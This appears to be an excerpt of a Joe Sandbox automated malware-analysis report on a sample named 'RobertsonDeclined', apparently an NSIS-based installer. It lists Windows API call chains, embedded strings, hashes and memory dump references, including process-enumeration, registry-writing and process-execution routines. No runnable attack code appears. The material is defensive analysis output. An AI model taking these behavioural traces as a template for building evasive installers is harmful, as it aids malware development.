                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                    • API String ID: 20674999-2124804629
                                                                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                    APIs
                                                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNEL32(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                                                                    • API String ID: 565278875-1653569448
                                                                                                    • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                    • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.ADVAPI32 ref: 004028DA
                                                                                                    • lstrlenW.KERNEL32(004130D8,00000023), ref: 004028FD
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?), ref: 004029BC
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                    Strings
                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                    • API String ID: 1641139501-220328614
                                                                                                    • Opcode ID: 851f9ae02ebf16e617d7dc7c261c2c3ae114e343f87d589352c7bd3343235263
                                                                                                    • Instruction ID: 4333191c585e2ccbf31537ec3fe99400e108362b2ae8da956978e4ec321c2a22
                                                                                                    • Opcode Fuzzy Hash: 851f9ae02ebf16e617d7dc7c261c2c3ae114e343f87d589352c7bd3343235263
                                                                                                    • Instruction Fuzzy Hash: 59319AB2E00208BFDF22AF91CE4699EBF76EB04714F10407BF505701A1D6794B60AB99
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                    • API String ID: 3734993849-2769509956
                                                                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001), ref: 0040419E
                                                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                                                    • SendMessageW.USER32(00000000,00000443,?,?), ref: 004041BD
                                                                                                    • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004041CB
                                                                                                    • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004041D6
                                                                                                    • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004041E3
                                                                                                    • SendMessageW.USER32(00000000,00000449,?,?), ref: 004041F2
                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00403FE1
                                                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001), ref: 00403FF0
                                                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00404004
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$ByteCharMultiWide$AllocButtonCheckColorGlobalItemlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3308522672-0
                                                                                                    • Opcode ID: c2e5bf2fee51a3b87e923a3f0ec37a23181173616caa330dd2575270d9358daf
                                                                                                    • Instruction ID: f43bbde6d36b0f8d2302eacd2e434541dff8fa1ace2a4d459b82edc74fb6029a
                                                                                                    • Opcode Fuzzy Hash: c2e5bf2fee51a3b87e923a3f0ec37a23181173616caa330dd2575270d9358daf
                                                                                                    • Instruction Fuzzy Hash: B431B2B1900109BFDB009F64DD85E6E3BA9FB44709F00803AFA05FB2E1D7789A51DB59
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                    Strings
                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                    • API String ID: 1033533793-945480824
                                                                                                    • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                    • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                    Strings
                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                    • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                    • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                    • GetMessagePos.USER32 ref: 00404871
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                    • MulDiv.KERNEL32(0000DC00,00000064,?), ref: 00403295
                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                    Strings
                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
